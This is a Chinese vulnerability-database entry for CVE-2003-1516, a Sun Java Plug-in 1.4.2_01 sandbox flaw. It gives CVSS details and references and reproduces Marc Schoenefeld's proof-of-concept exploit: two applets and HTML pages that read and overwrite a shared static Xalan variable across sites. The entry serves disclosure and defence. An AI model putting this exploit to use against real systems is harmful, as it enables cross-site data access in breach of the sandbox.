CVE-2003-1516
CVSS6.8
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:37:08
NMCOE    

[原文]The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.


[CNNVD]Sun Java跨站Applet Sandbox安全模型冲突漏洞(CNNVD-200312-166)

        
        Sun Java 2 SDK是一款Java实现平台。
        Sun Java实现存在一个漏洞,允许Java Applet违反sandbox安全模型,读/写访问不同域中数据。
        来自不同站点的跨站(Cross-Site)applet可通过未文档化JDK静态变量共享数据域。当更改这些变量JDK内部状态会遭到破坏和部分功能不正常。这尤其牵涉到依靠org.apache.xalan.processor.XSLProcessorVersion类进行XML处理时,会导致对sandbox安全模型冲突,使未标记applet能未授权访问标记applet使用的数据。
        

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1516
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1516
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-166
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/8857
(UNKNOWN)  BID  8857
http://www.securityfocus.com/archive/1/341815
(UNKNOWN)  BUGTRAQ  20031020 Cross Site Java applets

- 漏洞信息

Sun Java跨站Applet Sandbox安全模型冲突漏洞
中危 设计错误
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        
        Sun Java 2 SDK是一款Java实现平台。
        Sun Java实现存在一个漏洞,允许Java Applet违反sandbox安全模型,读/写访问不同域中数据。
        来自不同站点的跨站(Cross-Site)applet可通过未文档化JDK静态变量共享数据域。当更改这些变量JDK内部状态会遭到破坏和部分功能不正常。这尤其牵涉到依靠org.apache.xalan.processor.XSLProcessorVersion类进行XML处理时,会导致对sandbox安全模型冲突,使未标记applet能未授权访问标记applet使用的数据。
        

- 公告与补丁

        厂商补丁:
        Sun
        ---
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://sunsolve.sun.com/security

- 漏洞信息 (23265)

Sun Java Plug-In 1.4.2 _01 Cross-Site Applet Sandbox Security Model Violation Vulnerability (EDBID:23265)
windows remote
2003-10-20 Verified
0 Marc Schoenefeld
N/A [点击下载]
source: http://www.securityfocus.com/bid/8857/info

A vulnerability has been reported in Java implementations that may potentially allow Java applets from two different domains to violate the sandbox security model and share read/write access to data areas. This violates the principle of isolation that should be enforced by Java and it is possible for unsigned applets to gain unauthorized access to data used by signed applets.

This issue was reported for Java Plug-in 1.4.2_01 on Microsoft Windows platforms, though it is believed that other platforms are similarly affected. It is not known if other versions or Java implementations are also affected.

Two applets,
- one on siteA: www.siteA.org => Read.html / ReadApplet.class
- one on siteB: www.siteB.org => Write.html / WriteApplet.class

Applet from siteB can share a variable also accessible (read and write)
which is used by siteA. So data protection is not guaranteed, an unsigned
applet may grab data stored in this variable by a signed applet
or interfere it's XML processing and therefore violates the isolation
restriction of the sandbox.

==========READAPPLET=========================
/* Illegalaccess.org java exploit */
/* coded by Marc Schoenefeld */

import java.awt.Graphics;

public class ReadApplet extends java.applet.Applet {

public void paint(Graphics g)
{

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
}

static {

System.out.println(org.apache.xalan.processor.XSLProcessorVersion.S_VERSION);
}
}
==========READAPPLET=========================

==========WRITEAPPLET=========================
import java.awt.Graphics;


public class WriteApplet extends java.applet.Applet {
public void paint(Graphics g)
{
org.apache.xalan.processor.XSLProcessorVersion.S_VERSION += "a";
}


static {
org.apache.xalan.processor.XSLProcessorVersion.S_VERSION = "altered
from
SiteA";
}
}
==========WRITEAPPLET=========================


=========Write.html============================
<HTML>
<BODY BGCOLOR=#66FF66>
<PRE>
WriteApplet, write to variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=WriteApplet.class width=100 height=100>
</applet>
</BODY>
</HTML>

========Read.html=============================
<HTML>
<BODY BGCOLOR=#6666FF>
<PRE>
ReadApplet, read from variable
Marc (marc@org.illegalaccess)
</PRE>
<applet codebase=. code=ReadApplet.class width=100 height=100>
</applet>
</BODY>
</HTML> 		

- 漏洞信息

60412
Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
Local / Remote, Context Dependent
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-10-20 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站